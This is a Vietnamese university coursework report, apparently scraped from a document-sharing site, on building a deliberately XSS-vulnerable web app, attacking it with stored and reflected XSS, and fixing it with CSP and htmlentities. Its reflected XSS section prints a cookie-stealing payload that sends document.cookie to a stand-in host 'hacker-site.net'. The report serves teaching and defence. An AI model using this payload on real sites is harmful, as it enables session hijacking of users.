BTL_ATBM_nhom10

31 68 0
BTL_ATBM_nhom10

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

báo cáo bài tập lớn an toàn bảo mật thông tin k12 trường đại học công nghiệp hà nội Trong các hình thức tấn công thì tấn công bằng cách chèn mã độc XSS là phổ biến. Nó được coi là một trong những tấn công nguy hiểm nhất đối với các ứng dụng web và có thể mang lại những hậu quả nghiêm trọng. Thông thường, các cuộc tấn công XSS được sử dụng để vượt qua truy cập, ăn cắp dữ liệu nhận dạng của người dùng như: cookies, session tokens và các thông tin khác.

TRƯỜNG ĐẠI HỌC CÔNG NGHIỆP HÀ NỘI KHOA CÔNG NGHỆ THÔNG TIN   BÁO CÁO BÀI TẬP LỚN MƠN: AN TỒN BẢO MẬT THƠNG TIN ĐỀ TÀI: Xây dựng trang web bị lỗi XSS, thực kịch công XSS lên hệ thống xây dựng, thực thao tác thay đổi để loại bỏ công GVHD: Ths Trần Phương Nhung Lớp: KTPM1-K12 Sinh viên thực hiện: Mai Văn Thanh 2017603813 Nguyễn Sỹ Thăng 2017603449 Nguyễn Như Thảo 2017603721 Vũ Mạnh Thắng 2017604076 Vũ Văn Tiến 2019607819 Hà Nội 2020 MỤC LỤC MỤC LỤC HÌNH ẢNH Lời nói đầu Ngày nay, Internet với dịch vụ phong phú có khả cung cấp cho người phương tiện thuận tiện để trao đổi, tổ chức, tìm kiếm cung cấp thơng tin Tuy nhiên, phương thức truyền thống việc trao đổi, cung cấp thơng tin điện tử nhiều lĩnh vực địi hỏi tính bí mật, tính tồn vẹn, tính xác thực trách nhiệm thông tin trao đổi Bên cạnh đó, tốc độ xử lý máy tính ngày nâng cao, với sự trợ giúp máy tính tốc độ cao, khả cơng hệ thống thơng tin có độ bảo mật dễ xảy Chính người không ngừng nghiên cứu vấn đề bảo mật an tồn thơng tin để đảm bảo cho hệ thống thơng tin an tồn Cho đến ngày với sự phát triển cơng nghệ mã hóa phi đối xứng, ngưười ta nghiên cứu đưa nhiều kỹ thuật, nhiều mơ hình cho phép áp dụng xây dựng ứng dụng đòi hỏi tính an tồn thơng tin cao Sự phát triển vượt bậc công nghệ web đem lại nhiều thuận lợi cho người sử dụng nhà phát triển.Nhưng với sự phát triển ứng dụng web trở thành mục tiêu ưu thích kể cơng.Các hình thức cơng đa dạng thay đổi nội dung trang web,tấn công từ chối dịch vụ khiến cho việc truy cập trang web khơng thể thực hiện khó thực hiện,chiếm quyền điều khiển trang web… Mục tiêu hacker khác nhau,có thể cơng xuất phát từ thiện chí,nhằm tìm điểm yếu thơng báo cho nhà quản trị hệ thống.Nghiêm trọng cơng để phục vụ cho mục đích xấu tống tiền trang web,lấy cắp liệu nhạy cảm thơng tin thể tín dụng,mua hàng thơng qua tài khoản người khác… Trong hình thức cơng cơng cách chèn mã độc XSS phổ biến Nó coi công nguy hiểm đối với ứng dụng web mang lại hậu nghiêm trọng Thông thường, công XSS sử dụng để vượt qua truy cập, ăn cắp liệu nhận dạng người dùng như: cookies, session tokens thông tin khác CHƯƠNG GIỚI THIỆU VỀ XSS 1.1 Khái quát XSS XSS (Cross Site Scripting) lỗi bảo mật cho phép hacker nhúng mã độc (javascript) vào trang web khác Hacker lợi dụng mã độc để deface trang web, cài keylog, chiếm quyền điều khiển người dùng, dụ dỗ người dùng tải virus máy Đây lỗi bảo mật thường gặp trang web Các hệ thống từ lớn đến nhỏ Facebook, Twitter, số forum lớn Việt Nam, gặp phải lỗi XSS nằm top 10 lỗi bảo mật nghiêm trọng OSASP 1.2 Những dạng XSS 1.2.1 Server XSS → → Stored XSS Reflected XSS 1.2.2 Client XSS → DOM- BASED XSS CHƯƠNG XÂY DỰNG WEBSITE CHỨA LỖI XSS(Mai Văn Thanh) 2.1 Xây dựng website 2.1.1 Giao diên đăng ký Hình Giao diện đăng ký Mã nguồn: ĐĂNG ký Đăng ký 2.1.2 Giao diện đăng nhập Hình Giao diện đăng nhập Mã nguồn: ĐĂNG NHẬP Login 2.1.3 Giao diện trang web Hình Giao diện website Mã nguồn: Mã tài khoản Mật Họ tên Tên đăng nhập Quyền truy cập Địa Trạng thái < %=tai_khoan.getMa_tai_khoan() %> %> < %=tai_khoan.getTen_dang_nhap() %> < %=tai_khoan.getQuyen_truy_cap() %> 10 CHƯƠNG TẤN CÔNG KIỂU STORED XSS (Mai Văn Thanh) 3.1 Khái quát STORED XSS Stored XSS dạng công mà hacker thông qua việc chèn mã độc vào sở liệu website Dạng công xảy liệu gửi lên server không kiểm tra kỹ lưỡng mà lưu trữ trực tiếp vào sở liệu Khi người dùng truy cập vào trang web đoạn script độc hại thực thi chung với q trình load trang web Ví dụ form góp ý, comment … trang web Với kỹ thuật Stored XSS , hacker không khai thác trực tiếp mà phải thực hiện tối thiểu qua bước Hình Giao diện form 17 Đầu tiên hacker thông qua điểm đầu vào (form, input, textarea…) không kiểm tra kỹ để chèn vào CSDL đoạn mã (đoạn mã thay đổi liên kết, thay đổi background) nguy hiểm Hình Mã độc chèn thành cơng Chèn mã javascript thay đổi link: Hình Ảnh demo chèn mã độc thay đổi link Chèn mã javascript thay đổi background: Hình Ảnh demo thay đổi background 18 Tiếp theo, người dùng truy cập vào ứng dụng web thực hiện thao tác liên quan đến liệu lưu này, đoạn mã hacker thực thi trình duyệt người dùng Kịch khai thác: Hình Kịch khai thác lỗi xss 3.2 Thực bước công kiểu STORED XSS 3.2.1 Thực công website Giả định: Hacker thực hiện chức đăng ký tài khoản website 1, mục họ tên hacker nhập đoạn mã độc: alert("toi hacker") Các mục lại nhập thơng tin bình thường 19 Hình 10 Ảnh hacker thực nhập cơng Sau hacker ấn nút đăng ký Đăng ký thành công load đến form đăng nhập Hình 11 Ảnh Form đăng nhập Lúc đoạn mã độc thêm thành công vào sở liệu 20 Hình 12 Ảnh sở liệu website Khi đó, người dùng sử dụng tài khoản đăng nhập vào website Hình 13 Ảnh người dùng sử dụng tài khoản để đăng nhập Người dùng thực hiện chức có liên quan đến bảng “tai_khoan” CSDL mã độc hacker thực thi lập tức: 21 Hình 14 Mã độc thực thi 3.2.2 Thực bước phòng tránh Sử dụng CSP (Content Security Policy) Hiện ta dùng chuẩn CSP để chống XSS Với CSP trình duyệt chạy javascript từ domain định Cách thực hiện Đặt đoạn mã thư viện cặp thẻ 22 Hình 15 ảnh thêm CSP vào website 3.2.3 Thực kiểm tra lại Dùng tài khoản người dùng để kiểm tra Hình 16 Giao diện login người dung 23 Đăng nhập vào chức khơng cịn thấy lỗi Hình 17 Giao diện website → Kết quả: sau sử dụng CSP website khơng cịn lỗ hổng STORED XSS 24 CHƯƠNG TẤN CÔNG KIỂU REFLECTED XSS (Nguyễn Sỹ Thăng) 4.1 Tấn công kiểu Reflected XSS 4.1.1 Khái quát Reflected XSS: Gọi Reflected(phản xạ) kịch khai thác loại này, hacker phải gửi cho nạn nhân URL có chứa đoạn mã nguy hiểm(thường javascript) Nạn nhân cần request đến URL hacker nhận respond chứa kết mong muốn(tính phản xạ thể hiện đây) Ngồi biết đến với tên gọi firstorder XSS Chi tiết mơ tả qua bước sau: • Người dùng đăng nhập web giả sử gán session: Set- Cookie: sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 • Bằng cách đó, hacker gửi cho người dùng URL: http://example.com/name=var+i=new+Image; +i.src=”http://hacker-site.net/”%2Bdocument.cookie; Giả sử example.com website nạn nhân truy cập, hacker-site.net trang hacker tạo • Nạn nhân truy cập đến URL • Server phản hồi cho nạn nhân, kèm với liệu có request (đoạn javascript hacker) • Trình duyệt nạn nhân nhận phản hồi thực thi đoạn javascript • Đoạn javascript mà hacker tạo thực tế sau: 25 var i=new Image; i.src=”http://hacker-site.net/”+document.cookie; Dòng lệnh chất thực hiện request đến site hacker với tham số cookie người dùng: GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 HTTP/1.1 Host: hacker-site.net • Từ phía site mình, hacker bắt nội dung request coi session người dùng bị chiếm Đến lúc này, hacker giả mạo với tư cách nạn nhân thực hiện quyền website mà nạn nhân có 4.1.2 Thực bước công kiểu Reflected XSS Hình 18 Giao diện web 26 Hình 19 Ảnh tìm lỗ hổng XSS Phát hiện có lỗ hổng Hình 20 Ảnh phát lỗ hổng Thực hiện chèn mã độc 27 Hình 21 Ảnh chèn mã độc Hình 22 Ảnh mã độc thực thi Chèn mã độc thành công 28 Hình 23 Ảnh mã độc chèn vào 4.1.3 Thực bước phòng tránh và kiểm tra lại Mã hóa đầu : Ý tưởng tìm kiếm từ khóa nguy hiểm, mục nhập người dùng xóa chúng thay chúng chuỗi trống Những từ khóa đó,có thể : Thẻ , lệnh script, thẻ html Ta biến đổi ký tự đặc biệt thành dạng gọi htmlentities Các ngơn ngữ phía server cung cấp sẵn cơng cụ Ngôn ngữ php cung cấp hàm htmlentities() để chuyển đổi ký tự thành thực thể HTML 29 Hình 24 Ảnh thêm hàm htmlentities vào mã nguồn Kiểm tra lại: Hình 25 Ảnh website chạy Kết quả: Mã độc không chạy → Đã ngăn chặn công kiểu Reflected XSS 30 TÀI LIỆU THAM KHẢO Link website tham khảo → https://securitydaily.net/ky-thuat-khai-thac-xss-phan-1reflected-xss/ → https://viblo.asia/p/ky-thuat-tan-cong-xss-va-cach-ngan-chanYWOZr0Py5Q0 → https://viblo.asia/p/ki-thuat-tan-cong-cross-site-scripting73KbvZeLGmWB → https://quantrimang.com/cross-site-scripting-lo-hong-thu-vimoi-cua-nhung-ke-tan-cong-32105 → https://nhungdongcodevui.com/2019/07/29/lo-hong-xss-tan-conglay-cap-phien-dang-nhap-cua-nguoi-dung/ Link youtube tham khảo → https://www.youtube.com/watch?v=pltxnGlGFMc 31

Ngày đăng: 09/07/2020, 08:00

Hình ảnh liên quan

Hình 1. Giao diện đăng ký - BTL_ATBM_nhom10

Hình 1..

Giao diện đăng ký Xem tại trang 5 của tài liệu.
Hình 2. Giao diện đăng nhập - BTL_ATBM_nhom10

Hình 2..

Giao diện đăng nhập Xem tại trang 6 của tài liệu.
Hình 3. Giao diện website 1 - BTL_ATBM_nhom10

Hình 3..

Giao diện website 1 Xem tại trang 8 của tài liệu.
Hình 4. Giao diện websit e2 - BTL_ATBM_nhom10

Hình 4..

Giao diện websit e2 Xem tại trang 12 của tài liệu.
Hình 5. Giao diện form - BTL_ATBM_nhom10

Hình 5..

Giao diện form Xem tại trang 17 của tài liệu.
Hình 7. Ảnh demo chèn mã độc thay đổi link - BTL_ATBM_nhom10

Hình 7..

Ảnh demo chèn mã độc thay đổi link Xem tại trang 18 của tài liệu.
Hình 6. Mã độc chèn thành công - BTL_ATBM_nhom10

Hình 6..

Mã độc chèn thành công Xem tại trang 18 của tài liệu.
Hình 11. Ảnh Form đăng nhập - BTL_ATBM_nhom10

Hình 11..

Ảnh Form đăng nhập Xem tại trang 20 của tài liệu.
Hình 10. Ảnh hacker thực hiện nhập tấn công - BTL_ATBM_nhom10

Hình 10..

Ảnh hacker thực hiện nhập tấn công Xem tại trang 20 của tài liệu.
Hình 12. Ảnh cơ sở dữ liệu của website 1 - BTL_ATBM_nhom10

Hình 12..

Ảnh cơ sở dữ liệu của website 1 Xem tại trang 21 của tài liệu.
Hình 13. Ảnh người dùng sử dụng tài khoản của mình để đăng nhập - BTL_ATBM_nhom10

Hình 13..

Ảnh người dùng sử dụng tài khoản của mình để đăng nhập Xem tại trang 21 của tài liệu.
Hình 16. Giao diện login người dung - BTL_ATBM_nhom10

Hình 16..

Giao diện login người dung Xem tại trang 23 của tài liệu.
Hình 15. ảnh thêm CSP vào website 1 - BTL_ATBM_nhom10

Hình 15..

ảnh thêm CSP vào website 1 Xem tại trang 23 của tài liệu.
Hình 17. Giao diện website 1 - BTL_ATBM_nhom10

Hình 17..

Giao diện website 1 Xem tại trang 24 của tài liệu.
Hình 19. Ảnh tìm lỗ hổng XSS - BTL_ATBM_nhom10

Hình 19..

Ảnh tìm lỗ hổng XSS Xem tại trang 27 của tài liệu.
Hình 21. Ảnh chèn mã độc - BTL_ATBM_nhom10

Hình 21..

Ảnh chèn mã độc Xem tại trang 28 của tài liệu.
Hình 23. Ảnh mã độc đã được chèn vào - BTL_ATBM_nhom10

Hình 23..

Ảnh mã độc đã được chèn vào Xem tại trang 29 của tài liệu.
Hình 24. Ảnh thêm hàm htmlentities vào mã nguồn - BTL_ATBM_nhom10

Hình 24..

Ảnh thêm hàm htmlentities vào mã nguồn Xem tại trang 30 của tài liệu.

Mục lục

  • MỤC LỤC

  • MỤC LỤC HÌNH ẢNH

  • Lời nói đầu

  • CHƯƠNG 1. GIỚI THIỆU VỀ XSS

    • 1.1. Khái quát XSS

    • 1.2. Những dạng XSS

      • 1.2.1. Server XSS

      • 1.2.2. Client XSS

      • CHƯƠNG 2. XÂY DỰNG WEBSITE CHỨA LỖI XSS(Mai Văn Thanh)

        • 2.1. Xây dựng website 1

          • 2.1.1. Giao diên đăng ký

          • 2.1.2. Giao diện đăng nhập

          • 2.1.3. Giao diện trang web

          • 2.1.4. Cơ sở dữ liệu

          • 2.2. Xây dưng website 2

            • 2.2.1. Giao diện website

            • CHƯƠNG 3. TẤN CÔNG KIỂU STORED XSS (Mai Văn Thanh)

              • 3.1. Khái quát về STORED XSS

              • 3.2. Thực hiện các bước tấn công kiểu STORED XSS

                • 3.2.1. Thực hiện tấn công ở website 1

                • 3.2.2. Thực hiện các bước phòng tránh

                • 3.2.3. Thực hiện kiểm tra lại

                • CHƯƠNG 4. TẤN CÔNG KIỂU REFLECTED XSS (Nguyễn Sỹ Thăng)

                  • 4.1. Tấn công kiểu Reflected XSS

                    • 4.1.1. Khái quát về Reflected XSS:

                    • 4.1.2. Thực hiện các bước tấn công kiểu Reflected XSS.

                    • 4.1.3. Thực hiện các bước phòng tránh và kiểm tra lại

                    • TÀI LIỆU THAM KHẢO

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan